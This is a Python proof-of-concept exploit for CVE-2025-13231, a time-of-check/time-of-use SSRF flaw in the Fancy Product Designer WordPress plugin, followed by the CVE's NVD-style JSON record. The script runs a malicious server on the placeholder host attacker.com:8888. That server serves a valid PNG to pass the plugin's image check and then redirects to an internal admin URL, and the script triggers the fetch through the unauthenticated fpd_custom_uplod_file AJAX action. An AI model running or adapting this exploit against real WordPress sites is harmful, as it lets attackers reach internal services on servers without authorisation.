CVE-2025-13231

import http.server import socketserver import threading import time import requests # Attacker-controlled server that exploits TOCTOU race condition class TOCTOUHandler(http.server.BaseHTTPRequestHandler): def log_message(self, format, *args): pass # Suppress server logs def do_GET(self): # First request: Return valid image to bypass getimagesize() if not hasattr(self.server, 'request_count'): self.server.request_count = 0 self.server.request_count += 1 if self.server.request_count == 1: # Return valid PNG image header (8x8 transparent pixel) png_data = b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x08\x00\x00\x00\x08\x08\x02\x00\x00\x00\xef\x0b\x89\x6d\x00\x00\x00\x0cIDATx\x9cc\xf8\x0f\x00\x00\x01\x01\x00\x05\x18\xd8N\x00\x00\x00\x00IEND\xaeB`\x82' self.send_response(200) self.send_header('Content-Type', 'image/png') self.send_header('Content-Length', len(png_data)) self.end_headers() self.wfile.write(png_data) else: # Subsequent requests: Redirect to internal target redirect_url = 'http://127.0.0.1:80/admin/config.php' self.send_response(302) self.send_header('Location', redirect_url) self.end_headers() def start_attack_server(port=8888): with socketserver.TCPServer(('', port), TOCTOUHandler) as httpd: httpd.handle_request() # Handle first request httpd.handle_request() # Handle second request def exploit_ssrf(target_url, attacker_server): # Start malicious server in background thread server_thread = threading.Thread(target=start_attack_server, daemon=True) server_thread.start() time.sleep(0.1) # Ensure server is ready # Trigger SSRF via vulnerable AJAX endpoint vuln_endpoint = f'{target_url}/wp-admin/admin-ajax.php' payload = { 'action': 'fpd_custom_uplod_file', 'url': f'http://{attacker_server}/image.png' } try: response = requests.post(vuln_endpoint, data=payload, timeout=10) print(f'Status: {response.status_code}') print(f'Response: {response.text[:500]}') return response except Exception as e: print(f'Error: {e}') return None if __name__ == '__main__': # Configuration TARGET = 'http://vulnerable-site.com' ATTACKER = 'attacker.com:8888' print('[*] CVE-2025-13231 TOCTOU SSRF Exploit') print(f'[*] Target: {TARGET}') print(f'[*] Attacker Server: {ATTACKER}') exploit_ssrf(TARGET, ATTACKER)

{"cve": {"id": "CVE-2025-13231", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:51.813", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Fancy Product Designer plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.4.8. This is due to a time-of-check/time-of-use (TOCTOU) race condition in the 'url' parameter of the fpd_custom_uplod_file AJAX action. The plugin validates the URL by calling getimagesize() first, then later retrieves the same URL using file_get_contents(). This makes it possible for unauthenticated attackers to exploit the timing gap to perform SSRF attacks by serving a valid image during validation, then changing the response to redirect to arbitrary internal or external URLs during the actual fetch."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}], "references": [{"url": "https://support.fancyproductdesigner.com/support/discussions/topics/13000036024", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c56ec6ae-5b75-4cbb-aedd-f318fddc7bf0?source=cve", "source": "[email protected]"}]}}